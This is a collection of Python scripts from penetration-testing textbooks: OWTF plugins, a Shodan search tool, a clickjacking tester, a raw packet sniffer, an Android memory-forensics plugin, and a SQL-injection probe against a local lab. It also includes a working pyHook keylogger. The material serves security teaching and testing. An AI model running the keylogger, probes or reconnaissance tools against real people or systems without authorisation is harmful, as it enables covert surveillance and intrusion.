choices=valid_groups,
help="<web/network/auxiliary> - Initial plugin group: web (default) = "
"targets are interpreted as URLs = web assessment only\n"
"network = targets are interpreted as hosts/network ranges = "
"traditional network discovery and probing\nauxiliary = targets "
"are NOT interpreted, it is up to the plugin/resource "
"definition to decide what to do with the target",
)
parser.add_argument(
"-t",
"--plugin-type",
dest="plugin_type",
default="all",
choices=valid_types,
help="<plugin type> - For web plugins: passive, semi_passive, "
"quiet (passive + semi_passive), grep, active, all (default)\n"
"NOTE: grep plugins run automatically after semi_passive and "
"active in the default profile",
)
parser.add_argument("-port", "--port", dest="rport", default=None, help="<port> - Port to run probes")
parser.add_argument(
"-portwaves",
"--portwaves",
dest="port_waves",
default="10,100,1000",
help="<wave1,wave2,wave3> - Waves to run network scanning",
)
parser.add_argument(
"-proxy",
"--proxy",
dest="proxy_mode",
default=True,
action="store_true",
help="Use this flag to run OWTF Inbound Proxy",
)
parser.add_argument(
"--nowebui", dest="nowebui", default=False, action="store_true", help="Run OWTF without its Web UI."
)
parser.add_argument("targets", nargs="*", help="List of targets")
return parser.parse_args(cli_options)
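# Illustrative call (not part of the original module; the group/type lists below are example values only):
#   parse_options(["-g", "web", "http://my.website.com"],
#                 valid_groups=["web", "network", "auxiliary"],
#                 valid_types=["passive", "active", "all"])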
| 32.060185 | 115 | 0.565826 |
Python-Penetration-Testing-Cookbook | import urllib.request
import urllib.parse
import re
from os.path import basename
url = 'https://www.packtpub.com/'
queryString = 'all?search=&offset='
for i in range(0, 200, 12):
query = queryString + str(i)
    pageUrl = url + query
    print(pageUrl)
    response = urllib.request.urlopen(pageUrl)
source = response.read()
file = open("packtpub.txt", "wb")
file.write(source)
file.close()
patten = '(http)?s?:?(\/\/[^"]*\.(?:png|jpg|jpeg|gif|png|svg))'
for line in open('packtpub.txt'):
for m in re.findall(patten, line):
print('https:' + m[1])
fileName = basename(urllib.parse.urlsplit(m[1])[2])
print(fileName)
request = 'https:' + urllib.parse.quote(m[1])
img = urllib.request.urlopen(request).read()
file = open(fileName, "wb")
file.write(img)
file.close()
break
| 27.15625 | 67 | 0.57 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Copyright (C) 2015 Christian Hilgers, Holger Macht, Tilo Müller, Michael Spreitzenbarth
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import volatility.obj as obj
import volatility.plugins.linux.common as linux_common
import volatility.plugins.linux.pslist as linux_pslist
import volatility.plugins.linux.dalvik as dalvik
import volatility.plugins.linux.dalvik_loaded_classes as dalvik_loaded_classes
import volatility.plugins.linux.dalvik_find_class_instance as dalvik_find_class_instance
import time
from struct import *
###################################################################################################
class dalvik_app_pictures(linux_common.AbstractLinuxCommand):
###################################################################################################
def __init__(self, config, *args, **kwargs):
linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs)
dalvik.register_option_PID(self._config)
dalvik.register_option_GDVM_OFFSET(self._config)
self._config.add_option('CLASS_OFFSET', short_option = 'c', default = None,
help = 'This is the offset (in hex) of system class LocalAlbum.java', action = 'store', type = 'str')
###################################################################################################
def calculate(self):
# if no gDvm object offset was specified, use this one
if not self._config.GDVM_OFFSET:
self._config.GDVM_OFFSET = str(0x41b0)
# use linux_pslist plugin to find process address space and ID if not specified
proc_as = None
tasks = linux_pslist.linux_pslist(self._config).calculate()
for task in tasks:
if str(task.comm) == "droid.gallery3d":
proc_as = task.get_process_address_space()
self._config.PID = str(task.pid)
break
# use dalvik_loaded_classes plugin to find class offset if not specified
if not self._config.CLASS_OFFSET:
classes = dalvik_loaded_classes.dalvik_loaded_classes(self._config).calculate()
for task, clazz in classes:
if (dalvik.getString(clazz.sourceFile)+"" == "LocalAlbum.java"):
self._config.CLASS_OFFSET = str(hex(clazz.obj_offset))
break
# use dalvik_find_class_instance plugin to find a list of possible class instances
instance = dalvik_find_class_instance.dalvik_find_class_instance(self._config).calculate()
for sysClass, inst in instance:
# boolean value, 1 for images, 0 for videos
isImage = inst.clazz.getJValuebyName(inst, "mIsImage").int
# sanity check
if isImage != True:
continue
            # number of pictures, initialized with -1
count = inst.clazz.getJValuebyName(inst, "mCachedCount").int
# sanity check
if count == -1:
continue
# get album name
album_name = inst.clazz.getJValuebyName(inst, "mName").Object.dereference_as('Object')
# get pictures of album
album_path = inst.clazz.getJValuebyName(inst, "mItemPath").Object.dereference_as('Object')
iCache = album_path.clazz.getJValuebyName(album_path, "mChildren").Object.dereference_as('Object')
hashmap = iCache.clazz.getJValuebyName(iCache, "mWeakMap").Object.dereference_as('Object')
# in this table there is a reference to every single picture
map_table = hashmap.clazz.getJValuebyName(hashmap, "table").Object.dereference_as('ArrayObject')
# parse the table
map_entries = dalvik.parseArrayObject(map_table)
# for every reference of the table
for field in map_entries:
entry = field.clazz.getJValuebyName(field, "value").Object.dereference_as('Object')
weak_reference_clazz = entry.clazz.super.dereference_as('ClassObject')
reference_clazz = weak_reference_clazz.super.dereference_as('ClassObject')
image_path = reference_clazz.getJValuebyName(entry, "referent").Object.dereference_as('Object')
image_weak_reference = image_path.clazz.getJValuebyName(image_path, "mObject").Object.dereference_as('Object')
# finally this is the instance of one picture class
local_image = reference_clazz.getJValuebyName(image_weak_reference, "referent").Object.dereference_as('Object')
# the interesting information is found in the superclass
local_media_item = local_image.clazz.super.dereference_as('ClassObject')
# get picture information
image_name = local_media_item.getJValuebyName(local_image, "caption").Object.dereference_as('Object')
image_size = local_media_item.getJValuebyName(local_image, "fileSize").int
image_lat = local_media_item.getJValuebyName(local_image, "latitude").longlong
image_long = local_media_item.getJValuebyName(local_image, "longitude").longlong
image_date_taken = local_media_item.getJValuebyName(local_image, "dateTakenInMs").ulonglong
image_filepath = local_media_item.getJValuebyName(local_image, "filePath").Object.dereference_as('Object')
image_width = local_media_item.getJValuebyName(local_image, "width").int
image_heigth = local_media_item.getJValuebyName(local_image, "height").int
yield inst, image_name, album_name, image_size, image_lat, image_long, image_date_taken, image_width, image_heigth
###################################################################################################
def render_text(self, outfd, data):
self.table_header(outfd, [ ("Instance", "10"),
("Name", "20"),
("Album", "10"),
("Size (kb)", "9"),
("Width", "5"),
("Heigth", "6"),
("Date taken", "19"),
("GPS Lat", "13"),
("GPS Long", "13")
])
for inst, image_name, album_name, image_size, image_lat, image_long, image_date_taken, image_width, image_heigth in data:
# get strings from java string class
img_name = dalvik.parseJavaLangString(image_name)
a_name = dalvik.parseJavaLangString(album_name)
# convert picture size from bytes to kilobytes
size = image_size / 1024
# convert epoch time to human readable date and time
rawDate = image_date_taken / 1000
date = str(time.gmtime(rawDate).tm_mday) + "." + \
str(time.gmtime(rawDate).tm_mon) + "." + \
str(time.gmtime(rawDate).tm_year) + " " + \
str(time.gmtime(rawDate).tm_hour) + ":" + \
str(time.gmtime(rawDate).tm_min) + ":" + \
str(time.gmtime(rawDate).tm_sec)
# convert gps coordinates to double values
lat = pack('q', image_lat)
lat = unpack('d', lat)
lon = pack('q', image_long)
lon = unpack('d', lon)
self.table_row( outfd,
hex(inst.obj_offset),
img_name,
a_name,
size,
image_width,
image_heigth,
date,
lat,
lon)
| 54.111111 | 141 | 0.532654 |
Effective-Python-Penetration-Testing | from Crypto.Cipher import AES
import os, random, struct
def encrypt_file(key, filename, chunk_size=64*1024):
output_filename = filename + '.encrypted'
iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16)) # Initialization vector
encryptor = AES.new(key, AES.MODE_CBC, iv)
filesize = os.path.getsize(filename)
with open(filename, 'rb') as inputfile:
with open(output_filename, 'wb') as outputfile:
outputfile.write(struct.pack('<Q', filesize))
outputfile.write(iv)
while True:
chunk = inputfile.read(chunk_size)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += ' ' * (16 - len(chunk) % 16)
outputfile.write(encryptor.encrypt(chunk))
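# Companion sketch (not part of the original listing): one way to reverse the exact
# format written above (8-byte little-endian size, 16-byte IV, CBC-encrypted body).
# The '.decrypted' output name is an arbitrary choice for this example.
def decrypt_file(key, filename, chunk_size=64*1024):
    output_filename = filename.replace('.encrypted', '.decrypted')
    with open(filename, 'rb') as inputfile:
        filesize = struct.unpack('<Q', inputfile.read(struct.calcsize('Q')))[0]
        iv = inputfile.read(16)
        decryptor = AES.new(key, AES.MODE_CBC, iv)
        with open(output_filename, 'wb') as outputfile:
            while True:
                chunk = inputfile.read(chunk_size)
                if len(chunk) == 0:
                    break
                outputfile.write(decryptor.decrypt(chunk))
            # Drop the space padding appended by encrypt_file
            outputfile.truncate(filesize)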
encrypt_file('abcdefghji123456', 'sample-file.txt'); | 31.666667 | 89 | 0.580023 |
Hands-On-Penetration-Testing-with-Python | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Project'
db.create_table(u'xtreme_server_project', (
('project_name', self.gf('django.db.models.fields.CharField')(max_length=50, primary_key=True)),
('start_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('query_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
('consider_only', self.gf('django.db.models.fields.TextField')()),
('exclude_fields', self.gf('django.db.models.fields.TextField')()),
('status', self.gf('django.db.models.fields.CharField')(default='Not Set', max_length=50)),
('login_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('logout_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('username', self.gf('django.db.models.fields.TextField')()),
('password', self.gf('django.db.models.fields.TextField')()),
('username_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('password_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('auth_mode', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'xtreme_server', ['Project'])
# Adding model 'Page'
db.create_table(u'xtreme_server_page', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('URL', self.gf('django.db.models.fields.URLField')(max_length=200)),
('content', self.gf('django.db.models.fields.TextField')(blank=True)),
('visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('status_code', self.gf('django.db.models.fields.CharField')(max_length=256, blank=True)),
('connection_details', self.gf('django.db.models.fields.TextField')(blank=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('page_found_on', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Page'])
# Adding model 'Form'
db.create_table(u'xtreme_server_form', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('form_found_on', self.gf('django.db.models.fields.URLField')(max_length=200)),
('form_name', self.gf('django.db.models.fields.CharField')(max_length=512, blank=True)),
('form_method', self.gf('django.db.models.fields.CharField')(default='GET', max_length=10)),
('form_action', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
('form_content', self.gf('django.db.models.fields.TextField')(blank=True)),
('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('input_field_list', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Form'])
# Adding model 'InputField'
db.create_table(u'xtreme_server_inputfield', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('input_type', self.gf('django.db.models.fields.CharField')(default='input', max_length=256, blank=True)),
))
db.send_create_signal(u'xtreme_server', ['InputField'])
# Adding model 'Vulnerability'
db.create_table(u'xtreme_server_vulnerability', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('details', self.gf('django.db.models.fields.TextField')(blank=True)),
('url', self.gf('django.db.models.fields.TextField')(blank=True)),
('re_attack', self.gf('django.db.models.fields.TextField')(blank=True)),
('project', self.gf('django.db.models.fields.TextField')(blank=True)),
('timestamp', self.gf('django.db.models.fields.TextField')(blank=True)),
('msg_type', self.gf('django.db.models.fields.TextField')(blank=True)),
('msg', self.gf('django.db.models.fields.TextField')(blank=True)),
('auth', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Vulnerability'])
# Adding model 'Settings'
db.create_table(u'xtreme_server_settings', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
('consider_only', self.gf('django.db.models.fields.TextField')()),
('exclude_fields', self.gf('django.db.models.fields.TextField')()),
('username', self.gf('django.db.models.fields.TextField')()),
('password', self.gf('django.db.models.fields.TextField')()),
('auth_mode', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'xtreme_server', ['Settings'])
# Adding model 'LearntModel'
db.create_table(u'xtreme_server_learntmodel', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Page'])),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('query_id', self.gf('django.db.models.fields.TextField')()),
('learnt_model', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['LearntModel'])
def backwards(self, orm):
# Deleting model 'Project'
db.delete_table(u'xtreme_server_project')
# Deleting model 'Page'
db.delete_table(u'xtreme_server_page')
# Deleting model 'Form'
db.delete_table(u'xtreme_server_form')
# Deleting model 'InputField'
db.delete_table(u'xtreme_server_inputfield')
# Deleting model 'Vulnerability'
db.delete_table(u'xtreme_server_vulnerability')
# Deleting model 'Settings'
db.delete_table(u'xtreme_server_settings')
# Deleting model 'LearntModel'
db.delete_table(u'xtreme_server_learntmodel')
models = {
u'xtreme_server.form': {
'Meta': {'object_name': 'Form'},
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}),
'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"})
},
u'xtreme_server.inputfield': {
'Meta': {'object_name': 'InputField'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'})
},
u'xtreme_server.learntmodel': {
'Meta': {'object_name': 'LearntModel'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'query_id': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.page': {
'Meta': {'object_name': 'Page'},
'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'xtreme_server.project': {
'Meta': {'object_name': 'Project'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'password': ('django.db.models.fields.TextField', [], {}),
'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}),
'username': ('django.db.models.fields.TextField', [], {}),
'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"})
},
u'xtreme_server.settings': {
'Meta': {'object_name': 'Settings'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.TextField', [], {}),
'username': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.vulnerability': {
'Meta': {'object_name': 'Vulnerability'},
'auth': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msg': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'msg_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
're_attack': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'timestamp': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['xtreme_server'] | 63.71028 | 130 | 0.570521 |
PenTestScripts | #!/usr/bin/env python
# Script for interacting with Shodan's API and searching it.
# In case you get an import error for netaddr or shodan, run:
# apt-get install python-shodan python-netaddr
import argparse
from netaddr import IPNetwork
import os
import re
import shodan
import sys
def cli_parser():
# Command line argument parser
parser = argparse.ArgumentParser(
add_help=False,
description="ShodanSearch is a tool for searching shodan via its API.")
parser.add_argument(
"-search", metavar="Apache server", default=False,
help="Use this when searching Shodan for a string.")
parser.add_argument(
"-f", metavar="ips.txt", default=None,
help="File containing IPs to search shodan for.")
parser.add_argument(
"-ip", metavar='192.168.1.1', default=False,
help="Used to return results from Shodan about a specific IP.")
parser.add_argument(
"-cidr", metavar='192.168.1.0/24', default=False,
help="Used to return results from Shodan about a specific CIDR range.")
parser.add_argument(
"--hostnameonly", action='store_true',
help="[Optional] Only provide results with a Shodan stored hostname.")
parser.add_argument(
"--page", metavar='1', default=1,
help="Page number of results to return (default 1 (first page)).")
parser.add_argument(
'-h', '-?', '--h', '-help', '--help', action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
if args.h:
parser.print_help()
sys.exit()
return args.search, args.ip, args.cidr, args.hostnameonly, args.page, args.f
def create_shodan_object():
# Add your shodan API key here
api_key = "TYPEAPIKEYHERE"
shodan_object = shodan.WebAPI(api_key)
return shodan_object
def shodan_cidr_search(shodan_search_object, shodan_search_cidr, input_file_ips):
title()
if shodan_search_cidr is not False:
if not validate_cidr(shodan_search_cidr):
print "[*] ERROR: Please provide valid CIDR notation!"
sys.exit()
else:
print "[*] Searching Shodan for info about " + shodan_search_cidr
# Create cidr notated list
network = IPNetwork(shodan_search_cidr)
elif input_file_ips is not False:
try:
with open(input_file_ips, 'r') as ips_provided:
network = ips_provided.readlines()
except IOError:
print "[*] ERROR: You didn't provide a valid input file."
print "[*] ERROR: Please re-run and provide a valid file."
sys.exit()
# search shodan for each IP
for ip in network:
print "\n[*] Searching specifically for: " + str(ip)
try:
# Search Shodan
result = shodan_search_object.host(ip)
# Display basic info of result
print "\n*** RESULT ***"
print "IP: " + result['ip']
print "Country: " + result['country_name']
if result['city'] is not None:
print "City: " + result['city']
print "\n"
# Loop through other info
for item in result['data']:
print "Port: " + str(item['port'])
print "Banner: " + item['banner']
except Exception, e:
if str(e).strip() == "API access denied":
print "You provided an invalid API Key!"
print "Please provide a valid API Key and re-run!"
sys.exit()
elif str(e).strip() == "No information available for that IP.":
print "No information is available for " + str(ip)
else:
print "[*]Unknown Error: " + str(e)
def shodan_ip_search(shodan_search_object, shodan_search_ip):
title()
if validate_ip(shodan_search_ip):
print "[*] Searching Shodan for info about " + shodan_search_ip + "..."
try:
# Search Shodan
result = shodan_search_object.host(shodan_search_ip)
# Display basic info of result
print "\n*** RESULT ***"
print "IP: " + result['ip']
print "Country: " + result['country_name']
if result['city'] is not None:
print "City: " + result['city']
print "\n"
# Loop through other info
for item in result['data']:
print "Port: " + str(item['port'])
print "Banner: " + item['banner']
except Exception, e:
if str(e).strip() == "API access denied":
print "You provided an invalid API Key!"
print "Please provide a valid API Key and re-run!"
sys.exit()
elif str(e).strip() == "No information available for that IP.":
print "No information on Shodan about " +\
str(shodan_search_ip)
else:
print "[*]Unknown Error: " + str(e)
else:
print "[*]ERROR: You provided an invalid IP address!"
print "[*]ERROR: Please re-run and provide a valid IP."
sys.exit()
def shodan_string_search(shodan_search_object, shodan_search_string,
hostname_only, page_to_return):
title()
# Try/catch for searching the shodan api
print "[*] Searching Shodan...\n"
try:
# Time to search Shodan
results = shodan_search_object.search(
shodan_search_string, page=page_to_return)
if not hostname_only:
print "Total number of results back: " +\
str(results['total']) + "\n"
for result in results['matches']:
if hostname_only:
for item in result['hostnames']:
if item is None:
pass
else:
print "*** RESULT ***"
print "IP Address: " + result['ip']
if result['country_name'] is not None:
print "Country: " + result['country_name']
if result['updated'] is not None:
print "Last updated: " + result['updated']
if result['port'] is not None:
print "Port: " + str(result['port'])
print "Data: " + result['data']
for item in result['hostnames']:
print "Hostname: " + item
print
else:
print "*** RESULT ***"
print "IP Address: " + result['ip']
if result['country_name'] is not None:
print "Country: " + result['country_name']
if result['updated'] is not None:
print "Last updated: " + result['updated']
if result['port'] is not None:
print "Port: " + str(result['port'])
print "Data: " + result['data']
for item in result['hostnames']:
print "Hostname: " + item
print
except Exception, e:
if str(e).strip() == "API access denied":
print "You provided an invalid API Key!"
print "Please provide a valid API Key and re-run!"
sys.exit()
def title():
os.system('clear')
print "##################################################################"
print "# Shodan Search #"
print "##################################################################\n"
return
def validate_cidr(val_cidr):
    # This came from (Multi-line link for pep8 compliance)
# http://python-iptools.googlecode.com/svn-history/r4
# /trunk/iptools/__init__.py
cidr_re = re.compile(r'^(\d{1,3}\.){0,3}\d{1,3}/\d{1,2}$')
if cidr_re.match(val_cidr):
ip, mask = val_cidr.split('/')
if validate_ip(ip):
if int(mask) > 32:
return False
else:
return False
return True
return False
def validate_ip(val_ip):
    # This came from (Multi-line link for pep8 compliance)
# http://python-iptools.googlecode.com/svn-history/r4
# /trunk/iptools/__init__.py
ip_re = re.compile(r'^(\d{1,3}\.){0,3}\d{1,3}$')
if ip_re.match(val_ip):
quads = (int(q) for q in val_ip.split('.'))
for q in quads:
if q > 255:
return False
return True
return False
if __name__ == '__main__':
# Parse command line options
search_string, search_ip, search_cidr, search_hostnameonly,\
search_page_number, search_file = cli_parser()
# Create object used to search Shodan
shodan_api_object = create_shodan_object()
# Determine which action will be performed
if search_string is not False:
shodan_string_search(shodan_api_object, search_string,
search_hostnameonly, search_page_number)
elif search_ip is not False:
shodan_ip_search(shodan_api_object, search_ip)
elif search_cidr is not False or search_file is not None:
shodan_cidr_search(shodan_api_object, search_cidr, search_file)
else:
print "You didn't provide a valid option!"
| 32.741935 | 81 | 0.528843 |
cybersecurity-penetration-testing | # This program proves that the keyspace of the affine cipher is limited
# to len(SYMBOLS) ^ 2.
import affineCipher, cryptomath
message = 'Make things as simple as possible, but not simpler.'
for keyA in range(2, 100):
key = keyA * len(affineCipher.SYMBOLS) + 1
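    # The combined key encodes (keyA, keyB) as keyA * len(SYMBOLS) + keyB; keyB is fixed at 1 here.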
if cryptomath.gcd(keyA, len(affineCipher.SYMBOLS)) == 1:
print(keyA, affineCipher.encryptMessage(key, message)) | 35.545455 | 72 | 0.703242 |
owtf | """
PASSIVE Plugin for Testing: WS Information Gathering (OWASP-WS-001)
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Google Hacking/Third party sites for Web Services"
def run(PluginInfo):
resource = get_resources("WSPassiveSearchEngineDiscoveryLnk")
return plugin_helper.resource_linklist("Online Resources", resource)
| 29.769231 | 72 | 0.786967 |
cybersecurity-penetration-testing | import requests
from ghost import Ghost
import logging
import os
#<iframe src="http://usabledesigns.com/demo/iframe-test"></iframe>
URL = 'http://usabledesigns.com/demo/iframe-test'
URL = 'https://support.realvnc.com'
URL = 'https://evaluation.realvnc.com'
#def clickjack(URL):
req = requests.get(URL)
try:
xframe = req.headers['x-frame-options']
print 'X-FRAME-OPTIONS:', xframe , 'present, clickjacking not likely possible'
except:
print 'X-FRAME-OPTIONS missing'
print 'Attempting clickjacking...'
#clickjack(URL)
html = '''
<html>
<body>
<iframe src="'''+URL+'''" height='600px' width='800px'></iframe>
</body>
</html>'''
html_filename = 'clickjack.html'
log_filename = 'test.log'
f = open(html_filename, 'w+')
f.write(html)
f.close()
fh = logging.FileHandler(log_filename)
ghost = Ghost(log_level=logging.INFO, log_handler=fh)
page, resources = ghost.open(html_filename)
l = open(log_filename, 'r')
if 'forbidden by X-Frame-Options.' in l.read():
print 'Clickjacking mitigated via X-FRAME-OPTIONS'
else:
href = ghost.evaluate('document.location.href')[0]
if html_filename not in href:
print 'Frame busting detected'
else:
print 'Frame busting not detected, page is likely vulnerable to clickjacking'
l.close()
logging.getLogger('ghost').handlers[0].close()
os.unlink(log_filename)
os.unlink(html_filename) | 23.517857 | 85 | 0.699708 |
Python-Penetration-Testing-for-Developers | import socket
import struct
import binascii
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
while True:
pkt = s.recvfrom(2048)
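    # Offset 54 skips the 14-byte Ethernet, 20-byte IP and 20-byte TCP headers
    # (assuming no IP/TCP options), so the slice below keeps part of the TCP payload.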
banner = pkt[0][54:533]
print banner
print "--"*40
| 16.833333 | 74 | 0.71831 |
cybersecurity-penetration-testing | from os import readlink,lstat
import stat
path = '/etc/rc5.d/S99rc.local'
stat_info = lstat(path)
if stat.S_ISREG(stat_info.st_mode):
print 'File type: regular file'
if stat.S_ISDIR(stat_info.st_mode):
print 'File type: directory'
if stat.S_ISLNK(stat_info.st_mode):
print 'File type: symbolic link pointing to ',
print readlink(path)
| 18.105263 | 50 | 0.687845 |
PenetrationTestingScripts | "0.2.5"
__version__ = (0, 2, 5, None, None)
| 14 | 35 | 0.477273 |
owtf | """
Plugin for probing snmp
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = " SNMP Probing "
def run(PluginInfo):
resource = get_resources("SnmpProbeMethods")
return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
| 23.615385 | 88 | 0.746082 |
cybersecurity-penetration-testing | import pythoncom,pyHook
def OnKeyboardEvent(event):
"""
Process keyboard event
"""
    if event.Ascii != 0 and event.Ascii != 8: # Skip Null & Backspace
if event.Ascii == 13: # Handles a 'Enter' key press
keylogs = '<return>'
else:
keylogs = chr(event.Ascii)
print keylogs,
# Create a hook manager object
hm=pyHook.HookManager()
try:
    # Set function for keystroke processing
hm.KeyDown = OnKeyboardEvent
except (TypeError, KeyboardInterrupt):
    pass # Allow us to ignore errors that may cause the code to exit
# Set the hook
hm.HookKeyboard()
# Wait forever
pythoncom.PumpMessages()
| 24.192308 | 69 | 0.657492 |
cybersecurity-penetration-testing | import urllib2
GOOGLE_API_KEY = "{Insert your Google API key}"
target = "packtpub.com"
api_response = urllib2.urlopen("https://www.googleapis.com/plus/v1/people?query="+target+"&key="+GOOGLE_API_KEY).read()
api_response = api_response.split("\n")
for line in api_response:
if "displayName" in line:
print line | 35.888889 | 120 | 0.688822 |
cybersecurity-penetration-testing | import requests
url = "http://127.0.0.1/SQL/sqli-labs-master/Less-1/index.php?id="
initial = "'"
print "Testing "+ url
first = requests.post(url+initial)
if "mysql" in first.text.lower():
print "Injectable MySQL detected"
elif "native client" in first.text.lower():
print "Injectable MSSQL detected"
